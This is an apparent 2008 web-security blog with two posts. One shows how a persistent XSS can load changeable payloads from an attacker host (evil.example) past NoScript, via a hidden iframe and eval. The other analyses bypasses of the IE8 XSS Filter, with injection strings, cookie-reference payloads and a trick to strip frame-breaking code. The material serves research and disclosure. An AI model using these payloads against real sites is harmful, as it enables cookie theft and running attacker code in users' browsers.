Wednesday, September 24, 2008

Dynamic XSS Payloads in the face of NoScript

While participating in the CSAW CTF on the weekend before last with s0ban, sirdarckcat and maluc (which we won btw, with 16375 points; RPISEC, who placed second, had 13575 points, go us ;), I had an interesting thought. One of our attacks was a persistent XSS attack that loaded its payload from off-site so that we could gain some level of persistent control; however, I realised that this attack would fail completely in the face of NoScript even if our XSS succeeded, since the victim would not have our malicious domain whitelisted.

So, in light of that, I was thinking about how we could load our payload from an off-site server without the browser ever having to execute JavaScript served from that (non-whitelisted) domain. Of course, I am assuming you have already bypassed NoScript's XSS filters (e.g. because the attack was persistent); this is particularly useful for persistent attacks where you may want to change the payload later.

After thinking about this for a while, I realised that we already solved this problem back in 2006 when we were talking about using TinyURL for data storage: http://kuza55.blogspot.com/2006/12/using-tinyurl-for-storage-includes-poc.html.

Of course, TinyURL itself is of no use to us here, since we want to be able to change our payload; however, all it would take to make the technique useful is changing the URL to point to a domain you control (and possibly adding some kind of synchronisation so that chunks execute in the order we want, rather than the order the data comes back from our evil web server).
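As a rough sketch of how this could look (the hostnames and paths are made up, this assumes the attacker's server answers with a 302 back to a page on the target site with the payload URL-encoded in the fragment, and it assumes NoScript's optional iframe blocking isn't turned on), the persistent XSS running on the whitelisted site could do something like:

<script>
// This runs as the persistent XSS on the whitelisted site, so NoScript allows it.
// evil.example (hypothetical) replies with:
//   302 Location: http://www.site.com/anything#<urlencoded payload>
// so no JavaScript ever has to execute from the attacker's (non-whitelisted) domain.
var frame = document.createElement('iframe');
frame.style.display = 'none';
frame.src = 'http://evil.example/payload?' + new Date().getTime(); // cache-buster
document.body.appendChild(frame);

var poll = setInterval(function () {
    try {
        // Once the redirect lands back on our (whitelisted) origin we can read the fragment.
        var hash = frame.contentWindow.location.hash;
        if (hash.length > 1) {
            clearInterval(poll);
            eval(decodeURIComponent(hash.substring(1))); // execute the fetched payload
        }
    } catch (e) {
        // Still on evil.example (cross-domain access throws); keep polling.
    }
}, 100);
</script>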

Nothing really ground-breaking, but something interesting nonetheless.

Thursday, September 04, 2008

IE8 XSS Filter

IE8 came out recently and a bunch of people have already commented on the limitations of the XSS Filter.

But there are a few more issues that need to be looked at. First of all, if anyone hasn't already done so, I recommend reading this post by David Ross on the architecture/implementation of the XSS Filter.

After talking to Cesar Cerrudo, it became clear that we had both come to the same conclusion: the easiest way to get a generic bypass technique for the filter is to attack the same-site check, i.e. if we can somehow get the user to navigate from a page on the site we want to attack to our XSS, then we've bypassed the filter.

If the site is a forum or a blog, this becomes trivial since we're allowed to post links; but even if we cannot normally post links it is still trivial, because we can inject links via our XSS itself, as the XSS Filter doesn't stop plain HTML injection. In any case, read this for more details.
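As a hedged illustration (the xss.php page and its parameter are hypothetical), the HTML injection only needs to be a link back to the vulnerable page carrying the script payload; once the user clicks it, the navigation is same-site and the filter stands down:

<a href="http://www.site.com/xss.php?xss=<script>alert(7)</script>">click me</a>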

However, this is not the only way to force a client-side navigation. One particular issue (which is normally not considered much of a vulnerability unless it allows XSS) is an application letting users control the URL loaded in a frame; this is often seen in the help sections of web apps. Navigation caused by an iframe seems to be treated as somehow user-initiated (or something along those lines), so the same-site check is applied, and if we point a frame on a site at an XSS exploit on that same site, the exploit will trigger.
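To make that concrete (this is purely hypothetical; help.php, its page parameter and xss.php are all made up), if the target site emits a frame whose src comes from a request parameter, we simply point it at an XSS URL on the same site; the frame navigation passes the same-site check, so the filter leaves the framed response alone:

<!-- What http://www.site.com/help.php?page=... might emit, with the page value attacker-supplied: -->
<iframe src="http://www.site.com/xss.php?xss=%3Cscript%3Ealert(7)%3C%2Fscript%3E"></iframe>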

Initially I had thought this would extend to JavaScript-based redirects of the form:
document.location = "http://www.site.com/user_input";
or to frame-breaking code of the same form; however, this does not seem to be the case. IE attempts to determine whether a redirect was user-initiated, and if it decides it was not, it does not apply the same-site check and simply applies the XSS Filter. Though, as with the popup blocker before it, it has some difficulty getting this right 100% of the time, e.g. this counts as a user-initiated navigation:
<a name="x" id="x" href="http://localhost/xss.php?xss=<script>alert(7)</script>">test</a>
<script>
document.links[0].click();
</script>

However, this is probably a very unrealistic issue, as we need the vulnerable site to actually let the attacker create such a construct.

Furthermore, HTTP Location redirects and meta refreshes are not considered user navigation either, so filtering is always applied to them; open redirects are therefore pretty much irrelevant to the XSS Filter.

However, Flash-based redirects do not seem to be considered redirects at all (which is unsurprising, given that IE has no visibility into Flash files), so any Flash-based redirect can be taken advantage of to bypass the XSS Filter; though if it requires the user to click, it is probably easier to simply inject a link (as described in Cesar's post).

And that's about all I could think of wrt that check :S

However, if you go read Cesar's post you'll see we now do have a method to generically bypass the IE8 XSS Filter, and it only requires an additional click from the user, anywhere on the page.

In a completely different direction: when I first read the posts saying the XSS Filter was going to prevent injections into quoted JavaScript strings, my first thought was "yeah, right, let's see them try", as I had assumed they would try to stop an attacker breaking out of the string; instead, the filter has signatures to stop the actual payload. Essentially, the filter attempts to stop you from calling a JavaScript function and from assigning data to sensitive attributes, so all of the following injections are filtered:
"+eval(name)+"
");eval(name+"
";location=name;//
";a.b=c;//
";a[b]=c;//

among a variety of other sensitive attributes. However, this still leaves us with some limited scope for attacks that may be possible against reasonably complicated JavaScript.

We are still left with the ability to:
- Reference sensitive variables, which is especially useful when injecting into redirects (see the sketch after this list), e.g.
"+document.cookie+"
- Conduct variable assignments to sensitive data, e.g.
";user_input=document.cookie;//
or
";user_input=sensitive_app_specific_var;//
- Make function assignments (though note that you can't seem to assign to some functions; alert=eval, for example, doesn't seem to work), e.g.
";escape=eval;//

Also, like the meta-tag stripping attack described by the 80sec guys (awesome work btw, go 80sec!), we can get the filter to strip other pieces of the page (anything that looks like an XSS attack), such as frame-breaking code, redirects, etc. Note that we can't strip a single line out of a larger JS block and leave the rest running, since the block needs to be syntactically valid before any of it executes; but anything potentially active that sits in its own tag while acting as a security measure for the page beyond that tag can be stripped.
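As a hedged sketch of that idea (the page is hypothetical and the exact matching behaviour hasn't been verified here), if a page defends itself with a stand-alone frame-breaking script, an attacker can echo that same script back in a request parameter; the filter then "sees" a reflected attack and neuters the page's real copy, after which the page can be framed:

<!-- The target page protects itself with a stand-alone frame-breaking script: -->
<script>if(top!=self)top.location=self.location;</script>

<!-- From the attacker's page it is framed with that same script echoed in a query parameter
     (URL-encoding omitted for readability); the filter matches it against the response and
     neuters the page's legitimate frame-breaking code: -->
<iframe src="http://www.site.com/page.php?foo=<script>if(top!=self)top.location=self.location;</script>"></iframe>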

It's also worth noting that the XSS Filter doesn't strip all styles; it only strips those that would allow more styles to slip past it, and styles which can execute active code (which is pretty much just expression()).
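For reference, the sort of style the filter does go after is the old IE-only expression() construct, which evaluates JavaScript from within CSS, e.g.:

<div style="width: expression(alert(document.cookie))">some content</div>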

And that's all for me at the moment; if anyone's looking for an interesting area for research, see if the IE8 XSS Filter always plays nice with server-side XSS filters. Who knows, maybe by getting the filter to strip something and break the page's context, you can get your own HTML rendered in a context the server-side filter didn't expect.

P.S. Take all of this with a grain of salt: it has been derived through black-box testing, so the conclusions above are really just educated guesses.

P.P.S. Good on David Ross and Microsoft for making a positive move forward that's going to be on by default (opt-out). Obviously everyone is going to keep attacking it and finding weaknesses, but even if it only stops the scenario where the injection is right in the body of the page, it's a huge step forward for webappsec; and if it effectively blocks injections into JavaScript strings, then ASP.NET apps just got a whole lot more secure.
Though I still think the HTML-injection issue needs to be fixed, because even if it's an additional step, users are going to click around and we're just going to see attackers start utilising HTML injection.

P.P.P.S. Don't forget this is based on security zones, so it can be disabled, and it is opt-in (i.e. off by default) for the Intranet zone; all those XSS's against web servers on localhost or against intranet apps are going to be largely unaffected.